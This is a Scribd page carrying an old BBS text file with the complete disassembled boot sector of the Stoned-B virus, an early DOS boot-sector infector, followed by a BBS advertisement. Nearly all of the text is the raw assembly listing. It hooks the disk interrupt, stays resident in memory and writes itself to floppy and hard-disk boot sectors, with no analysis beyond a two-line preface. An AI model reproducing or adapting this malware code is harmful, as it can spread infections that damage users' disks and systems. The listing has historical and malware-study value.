Scribd Logo
Upload

Welcome to Scribd!

  • The Stoned-B Virus

    Uploaded by

    akbars.thasima
    32 views5 pages
    The Stoned-B Virus

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The Stoned-B Virus

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    32 views5 pages

    The Stoned-B Virus

    Uploaded by

    akbars.thasima
    The Stoned-B Virus

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 5

    The Stoned-B Virus

    The following code is the entire boot sector of a 5.25" DSDD


    floppy disk using a dummy start address of 1000 and an
    offset of 0100. The code was identified as the Stoned virus
    by McAfee's VirusScan v86B and disassembled using a Quick
    Basic disassembly utility.

    1000:0100 EA0500C007 JMP 07C0:0005


    1000:0105 E99900 JMP 01A1
    1000:0108 001B ADD [BP+DI],BL
    1000:010A 0300 ADD AX,[BX+SI]
    1000:010C C8 *XXX
    1000:010D E400 IN AL,00
    1000:010F 809F007C00 SBB BYTE PTR [BX+7C00],00
    1000:0114 001E5080 ADD [8050],BL
    1000:0118 FC CLD
    1000:0119 027217 ADD DH,[BP+SI+17]
    1000:011C 80FC04 CMP AH,04
    1000:011F 7312 JNB 0133
    1000:0121 0AD2 OR DL,DL
    1000:0123 750E JNZ 0133
    1000:0125 33C0 XOR AX,AX
    1000:0127 8ED8 MOV DS,AX
    1000:0129 A03F04 MOV AL,[043F]
    1000:012C A801 TEST AL,01
    1000:012E 7503 JNZ 0133
    1000:0130 E80700 CALL 013A
    1000:0133 58 POP AX
    1000:0134 1F POP DS
    1000:0135 2E CS:
    1000:0136 FF2E0900 JMP FAR [0009]
    1000:013A 53 PUSH BX
    1000:013B 51 PUSH CX
    1000:013C 52 PUSH DX
    1000:013D 06 PUSH ES
    1000:013E 56 PUSH SI
    1000:013F 57 PUSH DI
    1000:0140 BE0400 MOV SI,0004
    1000:0143 B80102 MOV AX,0201
    1000:0146 0E PUSH CS
    1000:0147 07 POP ES
    1000:0148 BB0002 MOV BX,0200
    1000:014B 33C9 XOR CX,CX
    1000:014D 8BD1 MOV DX,CX
    1000:014F 41 INC CX
    1000:0150 9C PUSHF
    1000:0151 2E CS:
    1000:0152 FF1E0900 CALL FAR [0009]
    1000:0156 730E JNB 0166
    1000:0158 33C0 XOR AX,AX
    1000:015A 9C PUSHF
    1000:015B 2E CS:
    1000:015C FF1E0900 CALL FAR [0009]
    1000:0160 4E DEC SI
    1000:0161 75E0 JNZ 0143
    1000:0163 EB35 JMP 019A
    1000:0165 90 NOP
    1000:0166 33F6 XOR SI,SI
    1000:0168 BF0002 MOV DI,0200
    1000:016B FC CLD
    1000:016C 0E PUSH CS
    1000:016D 1F POP DS
    1000:016E AD LODSW
    1000:016F 3B05 CMP AX,[DI]
    1000:0171 7506 JNZ 0179
    1000:0173 AD LODSW
    1000:0174 3B4502 CMP AX,[DI+02]
    1000:0177 7421 JZ 019A
    1000:0179 B80103 MOV AX,0301
    1000:017C BB0002 MOV BX,0200
    1000:017F B103 MOV CL,03
    1000:0181 B601 MOV DH,01
    1000:0183 9C PUSHF
    1000:0184 2E CS:
    1000:0185 FF1E0900 CALL FAR [0009]
    1000:0189 720F JB 019A
    1000:018B B80103 MOV AX,0301
    1000:018E 33DB XOR BX,BX
    1000:0190 B101 MOV CL,01
    1000:0192 33D2 XOR DX,DX
    1000:0194 9C PUSHF
    1000:0195 2E CS:
    1000:0196 FF1E0900 CALL FAR [0009]
    1000:019A 5F POP DI
    1000:019B 5E POP SI
    1000:019C 07 POP ES
    1000:019D 5A POP DX
    1000:019E 59 POP CX
    1000:019F 5B POP BX
    1000:01A0 C3 RET
    1000:01A1 33C0 XOR AX,AX
    1000:01A3 8ED8 MOV DS,AX
    1000:01A5 FA CLI
    1000:01A6 8ED0 MOV SS,AX
    1000:01A8 BC007C MOV SP,7C00
    1000:01AB FB STI
    1000:01AC A14C00 MOV AX,[004C]
    1000:01AF A3097C MOV [7C09],AX
    1000:01B2 A14E00 MOV AX,[004E]
    1000:01B5 A30B7C MOV [7C0B],AX
    1000:01B8 A11304 MOV AX,[0413]
    1000:01BB 48 DEC AX
    1000:01BC 48 DEC AX
    1000:01BD A31304 MOV [0413],AX
    1000:01C0 B106 MOV CL,06
    1000:01C2 D3E0 SAL AX,CL
    1000:01C4 8EC0 MOV ES,AX
    1000:01C6 A30F7C MOV [7C0F],AX
    1000:01C9 B81500 MOV AX,0015
    1000:01CC A34C00 MOV [004C],AX
    1000:01CF 8C064E00 MOV [004E],ES
    1000:01D3 B9B801 MOV CX,01B8
    1000:01D6 0E PUSH CS
    1000:01D7 1F POP DS
    1000:01D8 33F6 XOR SI,SI
    1000:01DA 8BFE MOV DI,SI
    1000:01DC FC CLD
    1000:01DD F3 REPZ
    1000:01DE A4 MOVSB
    1000:01DF 2E CS:
    1000:01E0 FF2E0D00 JMP FAR [000D]
    1000:01E4 B80000 MOV AX,0000
    1000:01E7 CD13 INT 13
    1000:01E9 33C0 XOR AX,AX
    1000:01EB 8EC0 MOV ES,AX
    1000:01ED B80102 MOV AX,0201
    1000:01F0 BB007C MOV BX,7C00
    1000:01F3 2E CS:
    1000:01F4 803E080000 CMP BYTE PTR [0008],00
    1000:01F9 740B JZ 0206
    1000:01FB B90700 MOV CX,0007
    1000:01FE BA8000 MOV DX,0080
    1000:0201 CD13 INT 13
    1000:0203 EB49 JMP 024E
    1000:0205 90 NOP
    1000:0206 B90300 MOV CX,0003
    1000:0209 BA0001 MOV DX,0100
    1000:020C CD13 INT 13
    1000:020E 723E JB 024E
    1000:0210 26 ES:
    1000:0211 F6066C0407 TEST BYTE PTR [046C],07
    1000:0216 7512 JNZ 022A
    1000:0218 BE8901 MOV SI,0189
    1000:021B 0E PUSH CS
    1000:021C 1F POP DS
    1000:021D AC LODSB
    1000:021E 0AC0 OR AL,AL
    1000:0220 7408 JZ 022A
    1000:0222 B40E MOV AH,0E
    1000:0224 B700 MOV BH,00
    1000:0226 CD10 INT 10
    1000:0228 EBF3 JMP 021D
    1000:022A 0E PUSH CS
    1000:022B 07 POP ES
    1000:022C B80102 MOV AX,0201
    1000:022F BB0002 MOV BX,0200
    1000:0232 B101 MOV CL,01
    1000:0234 BA8000 MOV DX,0080
    1000:0237 CD13 INT 13
    1000:0239 7213 JB 024E
    1000:023B 0E PUSH CS
    1000:023C 1F POP DS
    1000:023D BE0002 MOV SI,0200
    1000:0240 BF0000 MOV DI,0000
    1000:0243 AD LODSW
    1000:0244 3B05 CMP AX,[DI]
    1000:0246 7511 JNZ 0259
    1000:0248 AD LODSW
    1000:0249 3B4502 CMP AX,[DI+02]
    1000:024C 750B JNZ 0259
    1000:024E 2E CS:
    1000:024F C606080000 MOV BYTE PTR [0008],00
    1000:0254 2E CS:
    1000:0255 FF2E1100 JMP FAR [0011]
    1000:0259 2E CS:
    1000:025A C606080002 MOV BYTE PTR [0008],02
    1000:025F B80103 MOV AX,0301
    1000:0262 BB0002 MOV BX,0200
    1000:0265 B90700 MOV CX,0007
    1000:0268 BA8000 MOV DX,0080
    1000:026B CD13 INT 13
    1000:026D 72DF JB 024E
    1000:026F 0E PUSH CS
    1000:0270 1F POP DS
    1000:0271 0E PUSH CS
    1000:0272 07 POP ES
    1000:0273 BEBE03 MOV SI,03BE
    1000:0276 BFBE01 MOV DI,01BE
    1000:0279 B94202 MOV CX,0242
    1000:027C F3 REPZ
    1000:027D A4 MOVSB
    1000:027E B80103 MOV AX,0301
    1000:0281 33DB XOR BX,BX
    1000:0283 FEC1 INC CL
    1000:0285 CD13 INT 13
    1000:0287 EBC5 JMP 024E
    1000:0289 07 POP ES
    1000:028A 59 POP CX
    1000:028B 6F *XXX
    1000:028C 7572 JNZ 0300
    1000:028E 205043 AND [BX+SI+43],DL
    1000:0291 206973 AND [BX+DI+73],CH
    1000:0294 206E6F AND [BP+6F],CH
    1000:0297 7720 JA 02B9
    1000:0299 53 PUSH BX
    1000:029A 746F JZ 030B
    1000:029C 6E *XXX
    1000:029D 65 *XXX
    1000:029E 64 *XXX
    1000:029F 2107 AND [BX],AX
    1000:02A1 0D0A0A OR AX,0A0A
    1000:02A4 004C45 ADD [SI+45],CL
    1000:02A7 47 INC DI
    1000:02A8 41 INC CX
    1000:02A9 4C DEC SP
    1000:02AA 49 DEC CX
    1000:02AB 53 PUSH BX
    1000:02AC 45 INC BP
    1000:02AD 66 *XXX
    1000:02AE 0204 ADD AL,[SI]
    1000:02B0 2C01 SUB AL,01
    1000:02B2 2C01 SUB AL,01
    1000:02B4 0B05 OR AX,[DI]
    1000:02B6 66 *XXX
    1000:02B7 0200 ADD AL,[BX+SI]
    1000:02B9 0000 ADD [BX+SI],AL
    1000:02BB 0000 ADD [BX+SI],AL
    1000:02BD 0000 ADD [BX+SI],AL
    1000:02BF 0000 ADD [BX+SI],AL
    1000:02C1 0000 ADD [BX+SI],AL
    1000:02C3 0000 ADD [BX+SI],AL
    1000:02C5 0000 ADD [BX+SI],AL
    1000:02C7 0000 ADD [BX+SI],AL
    1000:02C9 0000 ADD [BX+SI],AL
    1000:02CB 0000 ADD [BX+SI],AL
    1000:02CD 0000 ADD [BX+SI],AL
    1000:02CF 0000 ADD [BX+SI],AL
    1000:02D1 0000 ADD [BX+SI],AL
    1000:02D3 0000 ADD [BX+SI],AL
    1000:02D5 0000 ADD [BX+SI],AL
    1000:02D7 0000 ADD [BX+SI],AL
    1000:02D9 0000 ADD [BX+SI],AL
    1000:02DB 0000 ADD [BX+SI],AL
    1000:02DD 0000 ADD [BX+SI],AL
    1000:02DF 0000 ADD [BX+SI],AL
    1000:02E1 0000 ADD [BX+SI],AL
    1000:02E3 0000 ADD [BX+SI],AL
    1000:02E5 0000 ADD [BX+SI],AL
    1000:02E7 0000 ADD [BX+SI],AL
    1000:02E9 0000 ADD [BX+SI],AL
    1000:02EB 0000 ADD [BX+SI],AL
    1000:02ED 0000 ADD [BX+SI],AL
    1000:02EF 0000 ADD [BX+SI],AL
    1000:02F1 0000 ADD [BX+SI],AL
    1000:02F3 0000 ADD [BX+SI],AL
    1000:02F5 0000 ADD [BX+SI],AL
    1000:02F7 0000 ADD [BX+SI],AL
    1000:02F9 0000 ADD [BX+SI],AL
    1000:02FB 0000 ADD [BX+SI],AL
    1000:02FD 0000 ADD [BX+SI],AL
    1000:02FF 0000 ADD [BX+SI],AL

    X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
    Another file downloaded from: NIRVANAnet(tm)

    & the Temple of the Screaming Electron Jeff Hunter 510-935-5845


    Burn This Flag Zardoz 408-363-9766
    realitycheck Poindexter Fortran 510-527-1662
    My Dog Bit Jesus Suzanne d'Fault 510-658-8078
    New Dork Sublime Demented Pimiento 415-864-DORK
    The Shrine Tom Joseph 408-747-0778

    "Raw Data for Raw Nerves"


    X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

    You might also like